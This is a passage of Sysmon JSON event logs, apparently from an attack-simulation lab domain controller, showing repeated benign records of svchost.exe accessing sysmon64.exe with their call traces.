C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1885,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1886,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1887,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1888,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1889,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1890,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1891,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1892,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 